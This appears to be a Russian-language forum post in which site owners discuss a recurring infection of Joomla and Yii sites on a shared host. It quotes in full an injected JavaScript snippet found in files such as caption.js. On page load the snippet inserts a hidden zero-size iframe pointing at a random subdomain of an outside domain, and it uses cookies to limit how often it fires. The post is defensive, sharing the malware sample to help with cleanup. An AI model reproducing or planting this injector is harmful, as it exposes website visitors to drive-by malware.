9 сентября опять появилось. только теперь код чуть модифицировали
var ifA0SRn = document.createElement('iframe');ifA0SRn.name = 'ifA0SRn';ifA0SRn.src = 'http://'+genstrdom(Math.floor(Math.random() * 20) + 5)+'.'+'amstechn.ru/';ifA0SRn.style.width = '0px';ifA0SRn.style.height = '0px';bindEvent(function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifA0SRn=') == -1) && (navigator.userAgent.search(/Opera|Firefox|MSIE/) > -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifA0SRn);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000);setTimeout(function() { document.cookie = 'ifA0SRn=yes; path=/; expires=' + expiresDate; }, 5000);}});function bindEvent(funct){window[((window[($aEL='addEventListener')])?($aEL):('attachEvent'))](((window[$aEL])?(''):('on'))+'load',funct,((window[$aEL])?(!1):(null)));}function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;}
видимо "антивирус" хостайфа пока пропускает новый код
Этот же хостинг, та же проблема.
У меня на всех джумлах была зараза в файлах /media/system/js/caption.js
Сначала дата изменения не менялась, последний раз изенилась у всех на 10 августа. несколько сайтов не чистил, наблюдал.
Похоже схема работы сканирует общедоступный сайт на предмет подключенных js. т.к. на сайтах на yii фрейворке заражены файлы с произвольными названиями. поэтому первым делом нужно проверить подключенные скрипты.
удалял уже раз пять, пароль на фтп поменял. Вроде не помогло.
